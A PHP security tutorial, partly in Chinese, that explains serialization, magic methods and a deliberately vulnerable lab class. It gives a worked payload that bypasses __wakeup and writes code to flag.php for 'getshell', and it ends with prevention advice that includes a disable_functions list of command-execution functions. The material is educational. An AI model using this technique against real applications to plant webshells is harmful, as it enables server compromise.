Deserialization vulnerability
0x01. What are serialization and deserialization?
Serialization: The process of converting variables into strings that can be saved or transmitted;
Deserialization: Converting serialized strings into original variables for use
Function: Can easily store and transmit data, making the program more maintainable
0x02. Why is there serialization?
Serialization is the process of storing or passing values in PHP without losing their type and structure.
0x03. Serialization and deserialization code examples
<?php
class User
{
public $username = 'admin';
public $password = '123456';
}
// 序列化操作
$user = new User();
$str_ser = serialize($user);
echo "序列化结果为:\n";
var_dump($str_ser);
echo "反序列化结果为:\n";
// 反序列化操作
$str_uns = 'O:4:"User":2:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";}';
$str = unserialize($str_uns);
var_dump($str);
?>
Running results:
The format after serialization is as follows:
0x04. Magic method
Magic methods are a unique feature of object-oriented PHP. They are triggered under specific circumstances and all start with a double underscore. You can understand them as hooks. Using pattern methods, you can easily implement overloading in PHP object-oriented (Overloading means dynamically creating class attributes and methods).
1.__construct,__destruct
__constuct构建对象的时被调用;
__destruct明确销毁对象或脚本结束时被调用;
2.__get,__set
__set当给不可访问或不存在属性赋值时被调用
__get读取不可访问或不存在属性时被调用
3.__isset,__unset
__isset对不可访问或不存在的属性调用isset()或empty()时被调用
__unset对不可访问或不存在的属性进行unset时被调用
4.__sleep,__wakeup
__sleep当使用serialize时被调用,当你不需要保存大对象的所有数据时很有用
__wakeup当使用unserialize时被调用,可用于做些对象的初始化操作
0x05. Cause of deserialization vulnerability
When the parameters passed to unserialize() are controllable, a carefully constructed payload can be injected, and when deserializing, some magic methods in the object may be triggered, causing malicious command execution!
0x06. Example of deserialization vulnerability
(1) The test code is as follows:
<?php
header("Content-Type:text/html;charset=utf-8");
class vFREE{
public $name='vFREE';
public $age='18';
function __wakeup(){
$this->age = "18";
echo("执行了wakeup魔术方法<br>");
}
function __destruct(){
echo("执行了destruct魔术方法");
$path='flag.php';
$file_get=file_put_contents($path,$this->name);
}
}
$flag = $_GET['flag'];
$unser = unserialize($flag);
?>
Explanation: The deserialization function unserialize is used outside the class, but when this function is used, it will be like checking whether there is a __wakeup method in the class vFREE. If there is a __wakeup method, it will be executed. If not, it will be skipped. Obviously, there is wakeup in the code. , but the content of wakeup is an assignment operation, which does not play a big role. Instead, it can be used in destruct, because destruct opens a flag.php file, and then writes the value of $this->name as the content. Go to flag.php, if we write a Trojan, we can Getshell
(2) We need to pass in a parameter flag and put the passed value into the deserialization function for execution, so what we want to pass in should be a serialized string. At this time we should sequence it like vFREE ization, the code is as follows:
<?php
class vFREE{
public $name='vFREE';
public $age='18';
function __wakeup(){
$this->age = "18";
}
function __destruct(){
$path='flag.php';
$file_get=file_put_contents($path,$this->name);
}
}
$test = new vFREE();
$str = serialize($test);
var_dump($str);
?>
得到序列化后的结果:O:5:"vFREE":2:{
s:4:"name";s:5:"vFREE";s:3:"age";s:2:"18";}
(3) Bypass the wakeup method:
Bypass the wakeup method, directly execute destruct and write to the shell:
change the original attribute value to achieve the effect of bypassing wakeup. At this time, the attribute value in the class is 2. We only need to change the attribute value to be greater than 2 to bypass it. Change it to 5 as follows to bypass:
O:5:"vFREE":5:{
s:4:"name";s:18:"<?php phpinfo();?>";s:3:"age";s:2:"18";}
(4) Pass in the malicious payload and successfully create flag.php
(5) Check the generated flag.php and use it successfully
0x07. Deserialization vulnerability prevention
(1)安全配置好php相关参数
通过Php配置文件里面有个disable_functions = 配置
这个禁止某些php函数,服务器便是用这个来禁止php的执行命令函数
#禁止这些函数来执行系统命令
例:disable_functions =system,passthru,shell_exec,exec,popen
(2)严格控制传入变量,严谨使用魔法函数